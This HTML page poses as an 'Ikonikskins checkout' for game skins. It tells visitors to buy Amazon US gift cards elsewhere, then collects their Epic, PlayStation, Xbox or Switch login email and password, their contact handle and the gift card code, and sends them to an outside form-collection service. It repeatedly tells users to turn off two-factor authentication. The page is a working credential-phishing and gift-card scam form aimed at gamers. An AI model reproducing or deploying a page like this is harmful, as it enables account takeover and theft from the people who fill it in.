<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Ikonikskins checkout</title>
<link rel="stylesheet" type="text/css" href="view.css" media="all">
<script type="text/javascript" src="view.js"></script>
</head>
<body id="main_body" class="safari">
<style>
.button {
  background-color: #4CAF50;
  border: none;
  color: white;
  padding: 15px 32px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 16px;
  margin: 4px 2px;
  cursor: pointer;
}

input[id^="spoiler"]{
 display: none;
}
input[id^="spoiler"] + label {
  display: block;
  width: 440px;
  margin: 0 auto;
  padding: 5px 20px;
  background: #4CAF50;
  color: #fff;
  text-align: center;
  font-size: 24px;
  border-radius: 0px;
  cursor: pointer;
  transition: all .6s;
}
input[id^="spoiler"]:checked + label {
  color: #333;
  background: #ccc;
}
input[id^="spoiler"] ~ .spoiler {
  width: 90%;
  height: 0;
  overflow: hidden;
  opacity: 0;
  margin: 10px auto 0; 
  padding: 10px; 
  background: #eee;
  border: 1px solid #ccc;
  border-radius: 1px;
  transition: all .6s;
}
input[id^="spoiler"]:checked + label + .spoiler{
  height: auto;
  opacity: 1;
  padding: 10px;
}





</style>

<h2 style="color: green;">Buy $ worth of amazon usa giftcards giftcards</h2>
<h2>Buy amazon usa giftcard on SEA gamer or offgamers</h2>
<a class="button" href="https://www.offgamers.com/gift-cards/buy/amazon-gift-card-us" target="_blank">Buy amazon usa giftcard giftcard on SEA-gamer</a><a class="button" href="https://www.seagm.com/amazon-gift-card-united-states" target="_blank">Click here to buy amazon usa giftcard on offgamers</a>


<h2 style="color: red;">ALL PLATFORMS ACCEPTED!</h2>
<img id="top" src="top.png" alt="">
<div id="form_container">
<h1><a></a></h1>
<form id="form_56527" class="appnitro" action="https://formspree.io/mgnpyblx" method="POST">
<div class="form_description">
<h2>Checkout</h2>
<p>Here you can checkout by using your purchased amazon usa giftcard(s).</p>
<p></p><h3 style="color: red;">You must turn off 2FA!</h3><p></p>
</div>
<ul>
<li id="li_1">
<label class="description" for="element_1">Discord / Instagram
</label>
<div>
<input id="element_1" name="Discord" class="element text small" type="text" maxlength="255" value="" required="">
</div><p class="guidelines" id="guide_1"><small>Where should we contact you? Discord or Instagram is fine.</small></p>
</li> <li id="li_2">
<label class="description" for="element_2">Epic Email
(Account credentials) </label>
<div>
<input id="element_2" name="Epic Email" class="element text medium" type="text" maxlength="255" value="" required="">
</div><p class="guidelines" id="guide_2"><small>You must turn off 2FA!</small></p>
</li> <li id="li_3">
<label class="description" for="element_3">Epic Password
(Account credentials) </label>
<div>
<input id="element_3" name="Epic Password" class="element text medium" type="text" maxlength="255" value="" required="">
</div>
</li><li id="li_1">
<label class="description" for="element_1">What account is it </label>
<div>
<select class="element select medium" id="element_1" name="Kind of account:" required="">
<option value="Epic" selected="selected">Epic</option>
<option value="Playstation">PS4</option>
<option value="Xbox">XBOX</option>
<option value="Nintendo switch">Switch</option>
</select>
</div>
<label class="description" for="element_1">From u salesman u purchased? </label>
<div>
<select class="element select medium" id="element_1" name="Kind of salesman:" required="">
<option value="Zaverxandrew" selected="selected">Zaverxandrew</option>
<option value="darkness">darkness</option>
<option value="FoivosV">FoivosV</option>
<option value="Xeloyal">Xeloyal</option>
<option value="Kazooie43">Kazooie43</option>
<option value="Pina colada">Pina colada</option>
<option value="other">other</option>
</select>
</div>
</li>
<p class="guidelines" id="guide_3"><small>You must turn off 2FA!</small></p>

<li id="li_4">
<label class="description" for="element_4">amazon usa giftcard (If you bought amazon usa giftcard below)<br>
</label>
<div>
<input id="element_4" name="€25 Cryptovoucher Code" class="element text large" type="text" maxlength="255" value="" required="">
</div>
</li>
<li class="buttons">
<input type="hidden" name="form_id" value="56527">
<input id="saveForm" class="button_text" type="submit" value="Submit">
</li>
</ul>
</form>
</div>
<img id="bottom" src="bottom.png" alt="">
</body>
</html>